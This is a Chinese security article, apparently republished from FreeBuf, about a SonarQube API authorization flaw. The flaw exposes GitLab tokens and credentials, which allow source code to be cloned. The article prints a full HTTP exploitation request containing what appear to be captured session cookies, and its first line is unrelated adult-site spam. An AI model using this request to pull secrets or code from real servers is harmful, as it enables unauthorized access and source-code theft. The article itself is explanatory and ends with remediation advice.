自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

SonarQube API越權(quán)漏洞的思考

作者:Glocksec
安全 漏洞
SonarQube是一款基于Web的工具,是一個開源的代碼質(zhì)量管理系統(tǒng),可幫助開發(fā)人員生成沒有安全問題、錯誤、漏洞、異常和一般問題的代碼。

?[[433918]]?

SonarQube是一款基于Web的工具,是一個開源的代碼質(zhì)量管理系統(tǒng),可幫助開發(fā)人員生成沒有安全問題、錯誤、漏洞、異常和一般問題的代碼。

如果您在開發(fā)一個小項(xiàng)目,那可能很容易,您可以仔細(xì)檢查代碼以發(fā)現(xiàn)任何問題。SonarQube屬于SAST類的代碼檢測工具,更側(cè)重于質(zhì)量檢查,也有一些針對性的安全檢測,比如SQL注入等,我用過商業(yè)版,試圖利用SAST來發(fā)現(xiàn)和解決代碼安全問題,比較失望。規(guī)則庫比較弱,自定義能力差,畢竟只是更專注于質(zhì)量檢查。

大背景

近期,境外網(wǎng)站又報(bào)道了一些涉及中國多個機(jī)構(gòu)和企業(yè)的代碼泄漏,就是利用SonarQube的這個API越權(quán)漏洞進(jìn)行的。

(1)The Chinese Ministry of Public Security 

   

(2) BOSCH 博世 

 

(3) 梅賽德斯奔馳

SonarQube API 未授權(quán)下載源代碼漏洞利用過程及原理

SonarSource SonarQube由于存在安全漏洞,攻擊者可利用該漏洞通過API設(shè)置值URI,發(fā)現(xiàn)明文的SMTP和GitLab憑證(tocken)等敏感信息泄露,可導(dǎo)致gitlab中項(xiàng)目的代碼可以被任意clone下載,其實(shí)這個漏洞在2019年就被發(fā)現(xiàn)了。官方修復(fù)過一次,但是又出現(xiàn)了新的漏洞,并且一直延伸到7-8-9多個版本。

漏洞細(xì)節(jié):

漏洞利用過程及證明:
(1)敏感配置泄漏:
以普通用戶登陸就可以查看該AP I信息,如下:
GET /api/settings/values HTTP/2
Host: sonar.******.com
Cookie:    experimentation_subject_id=ImExZjYyYTg4LTUwMmEtNDllOS1hNDNhLTZkYjc3OWVhNDM3YiI%3D--5753e714d025d34f4249d6d9d8cc7292ca0200b6; XSRF-TOKEN=5n4f4tq6qi30hg65n2h0qth56e; JWT-SESSION=eyJhbGciOiJIUzI1NiJ9.eyJqdGkiOiJBWGpaWGotUmlDeWV5OUM0SnkwbCIsInN1YiI6ImZlbmd3ZWlndW8iLCJpYXQiOjE2MTg1NTQ1MzUsImV4cCI6MTYxODgxMzczNSwibGFzdFJlZnJlc2hUaW1lIjoxNjE4NTU0NTM1ODI1LCJ4c3JmVG9rZW4iOiI1bjRmNHRxNnFpMzBoZzY1bjJoMHF0aDU2ZSJ9.5GEbBs6oJnoRYnSbPC3BUysSZgy5tIu-LOuO7iOSEGI
Sec-Ch-Ua: "Chromium";v="89", ";Not A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (KaliLinux; ARM) AppleWebKit/637.36 (KHTML, like Gecko) Chrome/189.0.4389.90 Safari/637.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

官方進(jìn)行過修復(fù)然后該接口應(yīng)該只允許管理員可查看。
但是很多內(nèi)置了默認(rèn)賬號和簡單弱口令賬號同樣可查看。

(2) 利用該user_token可以來從gitlab獲取代碼:

看,就是sonar.gitlab.user.token , 直接可以拉代碼數(shù)據(jù)。

還能通過配置文件看到數(shù)據(jù)庫賬號密碼等。非常久遠(yuǎn)的漏洞了。

看看如何利用sonar.gitlab.user.token 拉代碼:

解決辦法

關(guān)注廠商官方網(wǎng)站,即使升級補(bǔ)丁。

友情提醒

看看至少有多少暴露在公網(wǎng):數(shù)量還是很驚人的,這么多假裝在乎代碼質(zhì)量的用戶,不在乎安全性個代碼泄露。

SonarQube 不建議對公網(wǎng)開放,Devops流程中如需要使用SAST請采用專業(yè)的工具,請棄用SonarQube。

 

責(zé)任編輯:趙寧寧 來源: FreeBuf
漏洞SonarQube安全工具
相關(guān)推薦

2023-03-02 13:32:17

應(yīng)用安全網(wǎng)絡(luò)安全Web應(yīng)用

2021-04-21 08:00:00

Web工具漏洞

2020-09-01 07:58:34

API漏洞黑客

2015-10-13 09:13:42

2021-08-09 08:20:59

API安全測試漏洞

2021-01-08 13:37:25

API網(wǎng)關(guān)API開發(fā)平臺數(shù)據(jù)庫

2021-08-09 11:35:40

設(shè)計(jì)實(shí)踐應(yīng)用

2020-12-18 10:04:52

API漏洞應(yīng)用程序編程接口

2023-07-26 17:13:38

2021-10-18 10:29:15

API漏洞網(wǎng)絡(luò)安全

2021-09-01 15:48:50

API漏洞應(yīng)用程序安全

2020-05-29 09:36:59

越權(quán)訪問漏洞Web安全

2022-04-26 10:13:02

API漏洞安全

2023-07-21 14:04:37

2023-09-04 18:57:01

API接口數(shù)據(jù)中心

2022-12-08 10:33:48

2022-05-27 17:30:46

漏洞網(wǎng)絡(luò)攻擊

2022-04-19 08:26:20

WebAPI架構(gòu)

2021-12-26 07:24:54

Log4j安全漏洞漏洞

2017-02-17 08:14:27

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號